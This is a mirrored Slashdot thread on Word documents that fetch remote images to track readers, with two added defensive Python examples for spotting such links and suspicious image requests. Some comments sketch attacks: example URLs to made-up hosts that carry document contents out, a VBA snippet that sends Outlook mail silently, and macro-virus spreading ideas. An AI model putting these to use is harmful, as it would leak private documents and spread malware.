Slashdot Mirror


Microsoft Word Documents That "Phone Home"

ephraim writes "According to The Privacy Foundation, Microsoft Word documents have a 'feature' which allows the documents' creators to place web bugs within the documents that inform the author whenever somebody has opened the document via a web server's logging facilities. This 'feature' can also be used to set and view cookies on the reader's copy of Internet Explorer. The story can be found here. While this might be useful for tracking the distribution of confidential documents, it also raises serious red flags about privacy since most people probably aren't expecting their copy of MSWord to announce their reading habits every time they use it." Props to their CTO Richard M. Smith.

Here is what Microsoft had to say about it (emphasis added)...

Vendor Contact and Response

Microsoft was contacted about this issue on 8/4/00, and again on 8/25/00. They confirmed that Microsoft Word will access the Internet in order to fetch Web images that are linked to in a Word document. They went on to say that Word uses Internet Explorer to fetch images and therefore standard Web browser cookies can be both read and set from inside a Word document. However, the company claims that Word users can mitigate the use of cookies.

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

317 comments

  1. This would happen with HTML documents too by donutello · · Score: 5

    If I distributed an HTML document which had references to images or other objects on some website, every user opening that HTML document would cause an access to that web site.

    --
    Mmmm.. Donuts
    1. Re:This would happen with HTML documents too by Erasmus+Darwin · · Score: 3
      The difference is that embedded image tags within an HTML document are something that someone who's familiar with the technology expects. That's the whole point of a Hyper-Text Markup: it references other documents.

      Comparing a Word document retrieving arbitrary objects off the web to an HTML document retrieving arbitrary objects off the web is like comparing a shock from a defective toaster to a shock from sticking a fork in an outlet.

    2. Re:This would happen with HTML documents too by (void*) · · Score: 2

      The difference being that if you looked in the HTML source, you could find the offending link and fix it so that it does not reference the page. You could download it, and package it together with the HTML, modifying the reference so that other people will not hit the link. With the binary file format of Word, it's going to be hard to do this.
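Added example, not part of the thread: one way to surface remote links in a binary Word file without opening it in Word is to scan the raw bytes for URLs in both of the text encodings the format uses. The field keyword `INCLUDEPICTURE` and the field-begin mark `0x13` are Word's own; the sample bytes, hosts and helper names are constructed for illustration, and the field check is a heuristic rather than a full parser.

```python
import re
from typing import List, NamedTuple
from urllib.parse import urlsplit

# Bytes that may appear in a URL: printable ASCII minus quote and angle brackets.
URL_CHAR = rb'[^\x00-\x20"<>\x7f-\xff]'
# URL stored as single-byte text.
URL_8BIT = re.compile(rb"(?:https?|ftp)://" + URL_CHAR + rb"{4,}", re.I)
# Same URL stored as UTF-16LE: every ASCII character is followed by a NUL byte.
URL_16BIT = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00t\x00p\x00):\x00/\x00/\x00"
    rb"(?:" + URL_CHAR + rb"\x00){4,}",
    re.I,
)
FIELD_BEGIN = b"\x13"  # Word's field-begin mark precedes a field code


class RemoteLink(NamedTuple):
    offset: int          # byte offset of the URL in the file
    encoding: str        # how the URL was stored
    url: str
    host: str
    linked_image: bool   # True when the URL sits in an INCLUDEPICTURE field


def is_linked_image(data: bytes, start: int, window: int = 128) -> bool:
    """Heuristic: does the nearest preceding field code start with INCLUDEPICTURE?"""
    before = data[max(0, start - window):start].replace(b"\x00", b"")
    mark = before.rfind(FIELD_BEGIN)
    if mark < 0:
        return False
    return before[mark + 1:].strip().upper().startswith(b"INCLUDEPICTURE")


def find_remote_links(data: bytes) -> List[RemoteLink]:
    """Return every URL found in the raw bytes, ordered by file offset."""
    hits = []
    for pattern, encoding in ((URL_8BIT, "latin-1"), (URL_16BIT, "utf-16-le")):
        for match in pattern.finditer(data):
            url = match.group().decode(encoding)
            hits.append(RemoteLink(
                offset=match.start(),
                encoding=encoding,
                url=url,
                host=urlsplit(url).hostname or "",
                linked_image=is_linked_image(data, match.start()),
            ))
    return sorted(hits)


def make_field(url: str, encoding: str) -> bytes:
    """Build a constructed field: begin mark, field code, separator, result, end mark."""
    code = '\x13 INCLUDEPICTURE "%s" \\d \x14\x01\x15' % url
    return code.encode(encoding)


# Constructed sample bytes (not a valid .doc): header magic, body text with an
# ordinary URL, then one linked image in each encoding.
SAMPLE = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8
    + b"Quarterly report. See http://www.example.org/notes for background.\r"
    + make_field("http://tracker.example/pixel.gif?doc=1234", "latin-1")
    + b"\xff\xfe\x00\x00"
    + make_field("https://tracker.example/p.gif?doc=1234&copy=7", "utf-16-le")
)

if __name__ == "__main__":
    for link in find_remote_links(SAMPLE):
        kind = "linked image" if link.linked_image else "plain URL"
        print(f"{link.offset:5d}  {link.encoding:9s}  {kind:12s}  {link.url}")
```

Links reported as linked images are the ones Word would fetch on open; plain URLs in the text are listed so a reviewer can tell the two apart.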

    3. Re:This would happen with HTML documents too by iamriley · · Score: 1

      All M$ apps are suffering from the ultimate bloat--they're merging into one unified application based on XML.

      Soon there won't be a difference between Microsoft Word and Internet Explorer.

      --

      If you can read this, then I forgot to check "Post Anonymously".

    4. Re:This would happen with HTML documents too by Tau+Zero · · Score: 1
      If Word had a proper security sandbox setup, it could be extended to privacy as well. Neither viruses nor HREFs should cause accesses to anything without permission of the user. Bye-bye, web bug.

      Of course, Microsoft doesn't believe in security models.
      --
      Time is Nature's way of keeping everything from happening at once... the bitch.
    5. Re:This would happen with HTML documents too by Alternity · · Score: 2

      The main difference is that it's quite easy to see the source of an HTML document and so to spot the webbug.

      --


      "If liberty means anything at all, it means the right to tell people what they do not want to hear"
    6. Re:This would happen with HTML documents too by Shadowkiller · · Score: 5

      This may be totally offtopic, but I think this troll may be onto something. What if someone were to embed the DeCSS code into a Word macro virus? Just imagine the possibilities!

      Each time someone opens an infected document, it spreads copies the code into all .doc files on the hard drive. Given all the mystery bloat that typically accompanies Word documents anyway, I doubt anyone would even notice.

      As an added bonus, the Outlook-enhanced version could also send copies to 50 people in the address book!

      Before long, if it circulates far enough, we might even be getting copies of DeCSS which were inadvertently sent directly MPAA themselves! Oh, sweet irony.

    7. Re:This would happen with HTML documents too by JCCyC · · Score: 1
      Nonsense. While it may be true for MS shite, nothing on my system gets sent to the internet without my explicit involvement. It's just common sense.

      DMCA has outlawed common sense. Don't you read the news? Expect this sort of thing to be mandatory, i.e. you are not allowed to fix MS Word or Media Player or WinZip or WinAmp or whatever for not snitching (not even by putting a firewall machine between you and the 'Net), because that'll be a violation of the DMCA.

    8. Re:This would happen with HTML documents too by sparkz · · Score: 1
      Yeah; all this sounds like, is "if I request an object from the web, that request will be logged by the server I get it from".

      That's the same whether it's an HTML, MSWord, RTF document, or an image, executable binary, whatever. Similarly, if I download something from an FTP server, that will be logged.

      The only thing I can think that could be different is if I save the document locally, and it still contains an egg. So what? Surely the owner of the document is entitled to do that if they want?

      --
      Author, Shell Scripting : Expert Re
    9. Re:This would happen with HTML documents too by Captain+Pillbug · · Score: 1

      Using a Microsoft product is like sticking a fork in an outlet. That MSWord should behave this way is revolting but entirely "par for the course".

    10. Re:This would happen with HTML documents too by harhar · · Score: 1

      this can be done with java-script and pdf documents and adobe's pdf player also, i can dig up the code tonight if anyone wants to see. I saw it in a Mactech magazine months ago.


      --
      $var = <STDIN>;
      $var =~ s/\\$//;
      this is slashchomp
    11. Re:This would happen with HTML documents too by zeugma-amp · · Score: 1

      The difference being that if you looked in the HTML source, you could find the offending link and fix it so that it does not reference the page. You could download it, and package it together with the HTML, modifying the reference so that other people will not hit the link. With the binary file format of Word, it's going to be hard to do this.

      Many moons ago, while using WordPerfect 5 (or so), I found that I really loved the "reveal codes" feature. It actually made my initial foray into HTML much easier because I was already somewhat familiar with the concept. MS hides all that stuff and, to the best of my knowledge, doesn't give you the option to view it in simple text mode with formatting marks displayed. It is typical of their entire philosophy of letting users see as little as absolutely necessary of what they actually need to properly format documents.

      This is one reason their exported HTML looks so horrible. I can't tell you how many times I've seen "<b></b>" in converted HTML. It also makes the docs needlessly larger than they need to be.

      Z

      --
      This is an ex-parrot!
    12. Re:This would happen with HTML documents too by jawtheshark · · Score: 1
      God bless the good old Alt-F4!

      I had it all the time on too. It made everything easier and the first time I had to use Word I was so confused because I missed the tags. It was soo much easier to clean up a mess you made in the layout, instead of pressing "Undo" a dozen of times and hoping not to lose too much stuff (read: the "Word" way)
      The good old time will never come back :-(

      --
      Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
    13. Re:This would happen with HTML documents too by grahamm · · Score: 1

      Since when has it been mandatory for a PC running Word to be internet connected?

    14. Re:This would happen with HTML documents too by Zigg · · Score: 2

      So this isn't an issue, eh? Consider an e-mail with an IMG tag embedded that runs to a CGI. A parameter is given for your e-mail address (i.e. IMG SRC="http://bad-guys.example.com/logo?email=steve_g_parker@SPAM_ME.hotmail.com">). Said CGI offloads a cookie to your machine.

      Now bad-guys.example.com knows who you are and can track you all over their site.

      Not sounding so innocent now, is it?

    15. Re:This would happen with HTML documents too by alleria · · Score: 1

      Take source of ILOVEYOU, modify to include DeCSS source at the bottom, with font color as white. Nobody notices, except that their printer spits out a couplea extra blank pages at the end of every document...

      Should be reasonably easy, you'd think.

    16. Re:This would happen with HTML documents too by turgon · · Score: 1

      The article states "While this might be useful for tracking the distribution of confidential documents, it also raises serious red flags about privacy since most people probably aren't expecting their copy of MSWord to announce their reading habits every time they use it."

      Oh, please. Reading *habits*? It would announce that you've read THIS ONE DOCUMENT, and when. It wouldn't be announcing the fact that I like to read Larry Niven novels.

      Embedding web bugs in a document sucks, but let's be clear about the dangers.

    17. Re:This would happen with HTML documents too by JCCyC · · Score: 1
      It isn't... NOW. As Internet connectivity (at least on a daily basis) becomes the norm, pay-per-use becomes more viable. It seems some people will never be content unless everybody owes them an infinite amount of money.

    18. Re:This would happen with HTML documents too by logiceight · · Score: 1

      How do we know this isn't already happening? :)

    19. Re:This would happen with HTML documents too by carrier+lost · · Score: 1
      I believe the point can be summed in one word:

      volition

      MjM

  2. Well, that makes me feel better. by tycage · · Score: 5
    Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

    Since it's not happening now, it couldn't possibly start happening later. I've never seen a problem with a MicroSoft product be exploited weeks, months, even years after it was released. Now I'll be able to sleep at night.

    --Ty

    1. Re:Well, that makes me feel better. by dstanfor · · Score: 2
      Well, Microsoft knows that others aren't using Web bugs to track Word documents, because they've set it up so that they can track all Word documents with Web bugs.

      It was part of the fine print in the User Agreement that says " All content created with Microsoft Word belongs to Microsoft, and will be tracked accordingly."

    2. Re:Well, that makes me feel better. by unitron · · Score: 1

      I just had a really unpleasant thought about the true origin and composition of that "manna from heaven".

      --

      I see even classic Slashdot is now pretty much unusable on dial up anymore.

    3. Re:Well, that makes me feel better. by anonymous+cowerd · · Score: 2

      My Jehovah...My Jehovah

      Your Jehovah? You mean there's more than one, you polytheist, you pagan, you? Sheesh, these blasphemers, these days!

      Yours WDK - WKiernan@concentric.net

      ...measuring my Earth under my Sun...

    4. Re:Well, that makes me feel better. by carrier+lost · · Score: 1

      All hail Mazda!

  3. So let me get this straight. Word can:

    -Run arbitrary macros
    -Access your hardware
    -Access the Internet
    -Download and upload data
    -Set and send cookies

    I'm beginning to think Microsoft is right: They don't know the difference between an app and an OS.

    Just to spell it all out: A Word macro virus now has the ability to, say, infect all your existing Word files such that when you open one of those files the contents are sent to a named address on the Internet. Goodbye confidential documents!
    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:Um. by thelonius · · Score: 1

      no, i don't think word can upload data. the way the tracking works is to monitor requests for download by reading the web server logs.
      a word macro virus could infect all your existing word files so that they would all have web bugs. this would allow the virus writer to presumably know when anyone read your files, but the usefulness of that ability escapes me.

    2. Re:Um. by matman · · Score: 2

      On the contrary, if a document can access a url, a macro can build a URL containing the content of the document (at least, it could do it in parts, as a long document wouldn't probably fit in a 'get' method) Think, http://badass.hacked.com/recordfiles.cgi?from=yourhost.yourdomain.com&title=Confidential&part=1&content=the%20first%20part%20of%20your%20document

      have the macro embed like, 50 of these in image tags, and bingo, the thing just uploaded your document to an attackers system. It'd be even easier to do if the macro has the ability to do post methods.

    3. Re:Um. by Enzondio · · Score: 1
      no, i don't think word can upload data. the way the tracking works is to monitor requests for download by reading the web server logs. a word macro virus could infect all your existing word files so that they would all have web bugs. this would allow the virus writer to presumably know when anyone read your files, but the usefulness of that ability escapes me.

      This is slightly off topic but screw it. This can be done rather simply, although it doesn't relate to these so called web bugs. Assuming that we've gotten past the "This document contains macros" warning it's trivial to send out data over the Internet. The easiest way is to use Outlook.

      Set App = CreateObject("Outlook.Application")
      Set Mes = App.CreateItem(olMailItem)
      Mes.Subject = "Blah blah blah"
      Mes.To = "someone@somewhere.com"
      Mes.Send

      This will send the E-mail without the user ever knowing, with a few more lines it could also be deleted from the Sent Items folder. And of course it'd be pretty easy to attach files using this method. Of course it assumes that they actually USE Outlook, but considering the rate at which Melissa and ILOVEYOU spread I don't really think that's much of an issue.

    4. Re:Um. by Zagadka · · Score: 1

      no, i don't think word can upload data.

      Word (via IE) makes a request to a web server. If that request can be manipulated, then you can encode the data to upload in the request itself. For example:

      http://worddocslurper.net/cg-bin/dot.gif?fname=accounts.doc&chunk=0&data=Summary+of+my+bank+accounts%3A+%0c%0aBank+of+America%3A+%2448.96

      For someone who knew Word macros, this probably wouldn't be all that hard.

    5. Re:Um. by robin · · Score: 1

      If you can work out who reads a file that you sent into the bowels of an organisation, you can figure out who to send your `I Love You' trojan, with its `send me all of the spreadsheets on your machine' payload. Imagine delivering something attractive to the finance department, or to the HR department. There's a lot of value that can be generated from this kind of social engineering (and, conversely, a lot of damage that can be caused). Simply getting information on what browser the people on the inside of the firewall are using might be interesting.
      --
      W.A.S.T.E.
    6. Re:Um. by rlk · · Score: 2

      Suppose the Word virus were to, say, search for a particular string in each file on your disk, and if it finds it, insert a URL containing that string, or the context surrounding it. Then whenever someone opens that document, the URL gets sent to the hostile server. There's a limit of about 1K (I think) in an actual URL, but that still allows for a fair bit of data. If multiple web bugs are embedded, of course, it's possible to send across even more data.
      Remember that the web bug doesn't actually have to correspond to a real file on the hostile server; it just has to be something that the hostile server understands.
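Added example, not part of the thread: the pattern discussed in the comments above (image fetches whose query strings carry an identifier or chunks of content) can be looked for on the defender's side in outbound proxy logs. The log layout, hosts, thresholds and function names here are all constructed assumptions, not a real proxy's format.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

IMAGE_EXTENSIONS = (".gif", ".jpg", ".jpeg", ".png", ".bmp")
MAX_PAYLOAD_BYTES = 64      # assumed threshold for one request's decoded values
MIN_DISTINCT_QUERIES = 3    # assumed threshold for chunked requests to one image

# Constructed log lines in an assumed "client method url status" layout.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET http://images.example.org/logo.gif 200",
    "10.0.0.5 GET http://tracker.example/pixel.gif?doc=1234 200",
    "10.0.0.7 GET http://collector.example/dot.gif"
    "?fname=accounts.doc&chunk=0&data=Summary+of+bank+accounts 200",
    "10.0.0.7 GET http://collector.example/dot.gif"
    "?fname=accounts.doc&chunk=1&data=Checking%3A+48.96 200",
    "10.0.0.7 GET http://collector.example/dot.gif"
    "?fname=accounts.doc&chunk=2&data=Savings%3A+none 200",
    "10.0.0.9 GET http://collector.example/dot.gif?data=" + "Q3+forecast+" * 8 + " 200",
    "malformed line",
])


def image_query_requests(log_text):
    """Yield (group key, query, decoded payload size) for image GETs with a query."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "GET":
            continue  # skip malformed lines and other methods
        client, _, url, _ = parts
        target = urlsplit(url)
        if not target.query or not target.path.lower().endswith(IMAGE_EXTENSIONS):
            continue
        params = parse_qsl(target.query, keep_blank_values=True)
        payload = sum(len(value.encode("utf-8")) for _, value in params)
        yield (client, target.hostname or "", target.path), target.query, payload


def find_suspect_image_fetches(log_text):
    """Group image requests per client and image, then explain why each stands out."""
    groups = defaultdict(lambda: {"queries": set(), "total": 0, "largest": 0})
    for key, query, payload in image_query_requests(log_text):
        group = groups[key]
        if query not in group["queries"]:   # count each distinct query once
            group["queries"].add(query)
            group["total"] += payload
        group["largest"] = max(group["largest"], payload)

    findings = []
    for (client, host, path), group in sorted(groups.items()):
        reasons = []
        if group["largest"] > MAX_PAYLOAD_BYTES:
            reasons.append("large query payload")
        if len(group["queries"]) >= MIN_DISTINCT_QUERIES:
            reasons.append("many distinct queries")
        findings.append({
            "client": client,
            "image": host + path,
            "distinct_queries": len(group["queries"]),
            "payload_bytes": group["total"],
            "verdict": "possible upload via image URL" if reasons else "possible web bug",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in find_suspect_image_fetches(SAMPLE_LOG):
        print(finding)
```

A single small parameter on an image request is also how ordinary cache-busting looks, so the "possible web bug" verdict is a prompt for review, not a conclusion.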

    7. Re:Um. by Myddrin · · Score: 3

      Easier than that. It can the word macro
      could just access the internet capabilities of
      IE3.0 and above and ftp a file where-ever you
      want.

      Since it's known that IE is installed on almost
      every machine (and that it's an activex component)
      makes it just sooooo easy to say upload an entire
      harddrive to a given site....

      Or barring that, I'm sure there's some activex
      exploit that could be used to install the internet
      activex control that ships with vb(especially since activex controls signed by microsoft are automatically trusted until the user says they aren't anymore... then the sky is the limit!

      --
      Myddrin
    8. Re:Um. by NecroPuppy · · Score: 1

      And I don't even want to think about embedded scripts in the Word-link...

      Too late, thought about it...

      Would it be possible under this system to have a linked script that, say, erases a hard drive? My mailer (supposedly) blocks scripts from running from an e-mail, but there isn't any way I can see it finding a linked script embeded in a zipped Word doc...

      Makes me glad I use WordPerfect at home....

      NecroPuppy

      --
      I like you, Stuart. You're not like everyone else, here, at Slashdot.
    9. Re:Um. by Nephrite · · Score: 1
      So let me get this straight. Word can:

      -Run arbitrary macros
      -Access your hardware
      -Access the Internet
      -Download and upload data
      -Set and send cookies

      ...and despite all of above millions of lusers will continue using M$ products no matter what

    10. Re:Um. by Old+Wolf · · Score: 1

      It's you that can't tell the difference between the app and the OS. I can also do all of the things you mention in vi. To see for yourself, fire up vi and type this:

      !!wget http://www.slashdot.org/ 2>&1 >/dev/null ; cat index.html

      voila, web browsing from your text editor.

      The process involved is conceptually the same as what you are talking about in Windows, except that the call to the other application is made using COM rather than invoking a new shell and then running an executable. If you had a vi macro to do the above command, then you would have the same situation as in Windows.

  4. New virus already in mind... by Gaewyn+L+Knight · · Score: 2

    Well so you have your VBS virus write a web bug into every created document. In this is the registry settings that hold your password stored in a cookie and anytime you open the document you have "sent" your passwords to the bug writer.

    Can we say hole the size of ... well the size of Windows.... :)

    --
    Telcos have a lot of dark fibre in the States. Most people assume that's optical fibre...but it's actually moral fibre.
  5. Great news by Anonymous Coward · · Score: 2
    It's nice to see Slashdot finally giving Microsoft some credit for their innovations. Usually you see articles about "Microsoft is screwing us" and "Boo Microsoft", but for once we're seeing a neutral description of a great Microsoft feature.

    Good job, Slashdot! Keep up the good work!

  6. No big deal by rongen · · Score: 1

    This could be accomplished by embedding an "image tag" that uses a script as its image source, I expect? This is really no different than embedding one in a web page and is not really something I would worry about (any more than I worry about this happening with HTML).

    I haven't used Word in a really long time... Is it trivial to see where images are coming from or is there some way to prevent people from seeing their origin?

    It is easy to make a webbug visible by examining the info for the HTML page (or the source) but by then you have downloaded the HTML and it's too late :) so how is this MS thing any worse, or different?

    Just curious...

    --8<--

    --

    --8<--
  7. This isn't much different than Web Pages already.. by LionKimbro · · Score: 4

    We shouldn't be too surprised; Web Pages are already like this.

    I remember the surprise that a friend of mine showed when I showed her "Apache Logs".

    Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

    (This is a particularly paranoid friend of mine.)

    General rule of thumb: If you're doing something on the Internet, you're being logged.

    Do something useful: read "Transparent Society" and/or work on making yourself a more tolerant person, rather than fretting about your "privacy" (unaccountability).

  8. But only in a web browser by FascDot+Killed+My+Pr · · Score: 1

    People expect a web browser to be network-savvy. Clearly webbugs in a browser are bad, but at least you think to check there. But web bugs in a word processor??
    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
  9. How hard is it by Rurik · · Score: 4

    On the topic of Word: How hard is it to just have a simple word processor package?
    WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix. People want a small, reliable processor to type up homework and reports.
    They went on the right track with their installation process, which splits up Word into its vital components, and lets you choose which to install. But what good is that if it still installs components that you don't want, and don't trust on your machine (such as the topic)?

    1. Re:How hard is it by Zan+Thrax · · Score: 3

      WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix?

      Because those 1%ers are the ones who buy the upgrade as soon as it's available, and thus start the cycle of forcing others to upgrade to stay compatible with everyone else.

      --

      Intolerant people should be shot.
    2. Re:How hard is it by askheaves · · Score: 2
      Not everyone just wants a simple wordprocessor. If that's all you need, Notepad works rather well (or vi on a freeer system). High school students need to write reports. College students need to write reports, create lab reports (embedding charts, diagrams, etc) and other larger projects. Professionals need to create daily solutions (embedding diagrams, weblinks, using standard templates, using proofing tools on drafts, keeping version control, creating traceable requirement and design documents... the list goes on ad infinitum).

      Who wants to see Microsoft create a slew of about 150 products that do completely different things? I think that it's great that there are just a few flavors of productivity tools to choose from. They seem to be tailored pretty well to the needs of individuals, small businesses, enterprises, and us piraters that have the premium edition.

      The method of accomplishing such a comprehensive system like this is openness. Do you have any idea how easy it is to write an add-in for Outlook? There was an article in the July 2000 VCDJ (no link available) that showed very quickly how to create a full-featured add-in for Outlook. It allowed hooking into all sorts of notifications, adding buttons, getting to mail, etc... basically, really slick stuff.

      The price of this openness is that little exploits like this fall through the cracks. It's all a large balancing act where you decide what is necessary, and what risks are acceptable.

      --

      Because you can't, you won't, and you don't stop...
    3. Re:How hard is it by Policetape · · Score: 1

      Of course everyone wants a simple word processor. They just want it to do exactly what they need it for. Unfortunately not everyone needs it for the same exact little things. So if Microsoft can add the little features that everyone wants then everyone will buy their product.
      If you keep adding 1% then it will eventually add up to a whole lot of people. (Note: It will not add up to 100% because there is a % of people who will use other products)
      The reason that Word is so popular is because it can do all these things.

    4. Re:How hard is it by egburr · · Score: 1
      Not everyone just wants a simple wordprocessor. If that's all you need, Notepad works rather well (or vi on a freeer system).

      Those are not word processors. Those are text editors. Now, WordPad is a very limited, relatively simple word processor. Text editors let you edit the text. Word Processors let you format the text.

      Edward Burr

      --

      Edward Burr
      Having a smoking section in a restaurant is like having a peeing section in a swimming pool.
    5. Re:How hard is it by Zagadka · · Score: 1

      College students need to write reports, create lab reports (embedding charts, diagrams, etc) and other larger projects.

      In science and mathematics, at least, this is usually accomplished with LaTeX. Diagrams are done with any tool that can generate EPS, like xfig or Graphviz. MS Word's equation editor sucks quite badly.

      And there's a big difference between "you can embed diagrams" and "you can catch a virus". Yes, an exploit here or there is understandable. MS has made it quite clear that they're either clueless or careless when it comes to security, considering the sheer number and severity of exploits in their products. And their excuse that "there is no evidence that such activities are occurring" is even more unsettling. It reveals a whole attitude towards security akin to "the bank vault is secure until someone steals all the money".

    6. Re:How hard is it by kaphka · · Score: 2
      On the topic of Word: How hard is it to just have a simple word processor package?
      When you're using your hypothetical "simple word processor package", do you ever plan to use charts, or tables, or graphics? You probably do. Now, there are two ways that developers can add that sort of feature. They can write a complete spreadsheet/chart/graphics package from scratch, and #include it in the word processor... or they can create a mechanism that allows objects from other programs to be embedded in your document.

      Regardless of the security implications, no sane programmer would choose the former method. It wastes time, it makes the UI inconsistent, it bloats the code, and it creates many more opportunities for bugs. Even if those limitations aren't a problem, it would still never happen, because good programmers would sooner quit than be forced to cut-and-paste code (instead of using shared libraries.)

      Microsoft chose the latter option. All "active documents" can contain elements from any other COM object provider. The "downside" of this is that Office programs are now "too flexible" for many Slashdot types. IMHO, for the reasons above, I think that this is a fair trade-off.
      --

      MSK

    7. Re:How hard is it by Master+of+Kode+Fu · · Score: 1
      That's why EMACs is often considered short for "Eight Megs* And Constant Swapping."

      * Of course, this was when RAM sizes were much, much smaller than today...

    8. Re:How hard is it by Octos · · Score: 1

      Try AbiWord (www.abisource.com). It's basic and open source. It runs on windows and Linux and BeOS and more. It saves as text, RTF, or its own format that is XML-based. It also reads Word97 docs.

      --

      "I am not a number! I am a free man!"-- The Prisoner

    9. Re:How hard is it by baka_boy · · Score: 4
      Microsoft, like any software design group, has the right to make a design choice favoring code reusability over security. In my opinion, though, they've screwed up here by not making clear to their users the potential implications of a choice made when designing the application. The "user friendly" interface and widespread distribution of Microsoft productivity applications contributes to their appearance of being "safe", while the flexibility of the components makes them very powerful.

      The average user of MS Office knows their way around the interface, and may even be able to throw together a few quick-and-dirty macros, but they are by no means an experienced object-oriented programmer, or a distributed systems designer. They will not expect to have to check every Word processing document they receive for potential security risks; nor will they automatically run any filtering or TCP/IP monitoring software. Hence, there will continue to be millions of computers compromised to attackers on a regular basis.

      I have little sympathy for system administrators who fail to take basic precautions like changing default passwords or disabling unneeded services -- that's their job, and they should know better. However, I don't expect the same level of diligence from an inexperienced user who's trying to type view a business letter sent to them from outside the office. Microsoft distributes even their "basic" productivity applications with all the functionality of a basic operating system, makes that power easy to harness (for whatever purpose), and demonstrates little more to their average user than how easy it makes dragging and dropping a spreadsheet chart into a business report. That's irresponsible and misleading.

    10. Re:How hard is it by FFFish · · Score: 2

      People want *professional* level tools, even when they're not professionals.

      JASC Paintshop Pro is overkill for most people's graphics needs. It sells for what, a hundred bucks? Yet Photoshop is pirated like mad -- *not* because it's better, but because it's considered professional-grade. Joe Blow will never use 1/3rd its features... but it's what he wants.

      The same applies for wordprocessors.

      Unfortunately, what most people don't seem to realize is that there's a whole level of professionalism that's quite apart from the level of marketing.

      One thing that frustrates me is that so many products are de-facto standard not because they are superior, but because they were well-marketed.

      Corel has a suite of applications that is superior to the competition in almost every way:
      * by most accounts, CorelDraw is better than Illustrator, Freehand and PageMaker.
      * by many accounts, WordPerfect is superior to MS-Word.
      * by all accounts, Ventura Publisher is superior to Quark and FrameMaker.

      PhotoPaint versus Photoshop seems to be the only upset to Corel's domination on the basis of functionality and ease-of-use.

      Yet Corel is sinking like a stone, while these other inferior products continue to maintain de-facto status.

      It bothers me, 'cause I *hate* using inferior tools just because they're popular!

      Er, anyway, rant off. My point is: people don't want simple or minimalist. They want *professional* tools. Even if they are overkill.


      --
      Don't like it? Respond with words, not karma.
    11. Re:How hard is it by quantum+bit · · Score: 1

      I definitely agree on the Corel vs. Adobe argument here! The only exception is that I prefer PhotoPaint over Photoshop any day for professional-level image manipulation. They both have about the same level of power (and Corel seems to jump ahead in their new releases faster), but the PhotoPaint user interface is *SO* much nicer. Photoshop always reminds me of old MacOS applications... (maybe because that's where it came from). I never could understand why it's so popular.

      Of course there's always GIMP, but how could I get away with running Linux at work? ;)

    12. Re:How hard is it by um...+Lucas · · Score: 1

      Then use WordPad... It's free. It's functional. And it has none of the annoyances of word, unless you're one of those 1%'ers... Which most everyone is, really. As much as you don't want to be, if you use Word, odds are that there's some esoteric feature that you use that other people don't quite consider part of a "normal" word processor.

    13. Re:How hard is it by Quintin+Stone · · Score: 1

      But who in their right mind uses EMACS?

      --

      "Prejudice is wrong; you should hate everyone the same."

    14. Re:How hard is it by psyfir · · Score: 1

      I definitely agree with this statement. We have to use Word at work, and often I have had to compose in WordPerfect and import it into Word because I just couldn't get Word to do it correctly. (Tables is a biggie here.) It's unfortunate that so many companies standardize on Word because it's shoved down their throats by the Micro$oft, not because it's a better product.

      I characterize WordPerfect as the Ultimate Front-End for Word.

    15. Re:How hard is it by Metrol · · Score: 2

      The price of this openness is that little exploits like this fall through the cracks.

      No. The price of this openness are viruses like ILOVEYOU which did nothing at all but utilize the tools that Microsoft provided.

      I'll grant you, reusing components and interlinking apps really is a good idea. At the same time, some level of consideration needs to be paid to even the most basic level of security. Should a word processor, or any other Office app, be given the ability to alter the OS without any restrictions? Maybe I'm lacking some imagination here, but I can't think of a single good reason why Excel should be allowed to alter ANY entry in my registry.

      Speaking of registry probs, more interesting stuff on this in a later post by me.

      --
      The line must be drawn here. This far. No further.
    16. Re:How hard is it by mondamay · · Score: 1

      WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix.

      I think the reason has to do with their use of components and COM. If you read that interview with Miguel (something about "Unix Sucks"), you'll recall that he praised MS for designing components that can be added to an application with little overhead. So adding all the junk to Word is so simple they probably couldn't resist.

      --
      --Last Exit To Babylon
    17. Re:How hard is it by DGregory · · Score: 1

      Hear, hear. I just set up my cousin's computer (hand me down from her father) so that she and her 78 yr old roommate could use AOL for e-mail. These are people who didn't know what a floppy disk was or that computers write your password in as stars. I put Wordpad, Solitaire, Hearts, and AOL on the desktop, explained that you click on the icon twice to open it, click on the x in the corner to close it. She got a full copy of an older edition of Microsoft Office, but I think she'll be happy with Wordpad for awhile. She writes faster with her hand than on a keyboard anyways.

    18. Re:How hard is it by compwiz3688 · · Score: 1

      How hard is it to patch up Word/Excel, whatnot, so that all macros only affect within the document?!?! Why do those macros need to get outside of the documents?!?! I just can't stand it!

      Oh wait, that's exactly why the only Microsoft product on my machine is the OS... Then again, who knows what they have done with the OS as well?!

      ---
      Mouse location changed. You must restart Windows for the changes to take effect.

    19. Re:How hard is it by Sloppy · · Score: 1

      WTF does Microsoft have to insist on throwing every single bell and whistle that the 1%'ers want into the mix.

      To get more bullet points in the reviews. "Internet" is a hot word. If your product isn't "Internet enabled" then your buzzword count is going to be lower than your competitor's.

      People want a small, reliable processor to type up homework and reports.

      Most people don't make purchasing decisions based on what they want. Read up on marketing psychology some time. It's depressing.


      ---
      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    20. Re:How hard is it by fsck · · Score: 1

      Check out Vigor and see just what Clippy's evil cousin is up to.

      http://www.red-bean.com/~joelh/vigor/

      --

      Lars - ...I could always phone Linus when I had a problem.
  10. Haven't we seen something like this before? by jesser · · Score: 1
    This sounds pretty familiar. It's only slightly more disturbing to me that MSWord has this hole than that Outlook Express, Netscape, and Mozilla have it.

